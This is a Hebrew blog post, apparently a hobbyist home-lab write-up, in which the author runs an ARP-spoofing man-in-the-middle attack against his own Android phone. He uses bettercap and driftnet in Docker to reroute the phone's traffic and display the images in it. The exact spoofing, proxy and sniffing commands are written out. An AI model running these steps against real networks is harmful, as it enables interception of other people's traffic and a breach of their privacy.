חיפוש
  • יניב אור

מעבדת סייבר - 2

עודכן ב: מאי 9

המטרה

לגרום לקורבן להעביר את כל התעבורה שלו - במקום דרך הראוטר - דרך התוקף ובנוסף להציג על המסך תמונות שעברו בתעבורה הזאת.


התוקף

לפטופ Asus ROG Strix - מריץ אובונטו 18.04.


הקורבן

סמארטפון OnePlus X שברשותי - מריץ Android 6.0.1.


הכלים

- התוכנה bettercap - רצה בקונטיינר נפרד. ראו: Bettercap.

- התוכנה driftnet - גם היא רצה בקונטיינר נפרד. ראו: driftnet.


הערות

- המכשירים שייכים לי, כמובן, והניסוי נערך ברשת הביתית שלי.

- נקודת המוצא היא שאני והקורבן מחוברים לאותה רשת. במציאות זה לאו דווקא יהיה המצב, כמובן, ואצטרך למצוא דרך להיכנס לרשת שבה נמצא הקורבן או להעביר אותו לרשת שלי.


שלבי התקיפה

הרצתי את הקונטיינר כך שיהיה במצב אינטראקטיבי וישתמש בהגדרות רשת של ה-host.

$ docker run --rm -it --privileged --net=host bettercap/bettercap


לאחר מכן, בטרמינל של התוכנה, ביצעתי probe לגילוי מכשירים ברשת.

» net.probe on


ברגע שזיהיתי את מכשיר הקורבן - OnePlus Tech (Shenzhen) Ltd בכתובת 192.168.1.8 - כיביתי את ה-probe.

» net.probe off


הגדרתי arp spoof לכתובת IP הרצויה, הרצתי arp spoof ובמקביל הרצתי proxy כדי שהתעבורה של מכשיר הקורבן, שתעבור דרכי, תעבור לראוטר וכדי שהתעבורה מהראוטר, שתגיעהאלי, תעבור למכשיר הקורבן.


» set arp.spoof.targets 192.168.1.8

» arp.spoof on

» http.proxy on



לאחר מכן הרצתי את ה-driftnet.

$ docker run --rm -it --env DISPLAY=unix$DISPLAY --network host dsniff driftnet -i wlo1



ובמקביל גלשתי עם מכשיר הקורבן לאתר ששייך לי ובו התעבורה עוברת ב-HTTP.



כפי שניתן לראות, התקיפה בוצעה בהצלחה - אך במצב אמיתי, אין לי גישה למכשיר הקורבן ואני לא באמת יודע אם ה-arp spoof וה-proxy עובד - לכן, לצורך debug, הרצתי ב-bettercap את הפקודה net sniff עם verbosity נמוך והתעבורה הופיעה על המסך.


» set net.sniff.verbose false

» net.sniff on



שימו לב לפשטות שבשימוש ב-bettercap יחסית לדרך שמוצגת במעבדה: מעבדת סייבר - 1


מעבדות נוספות:

מעבדות סייבר

© 2023 by DO IT YOURSELF. Proudly created with Wix.com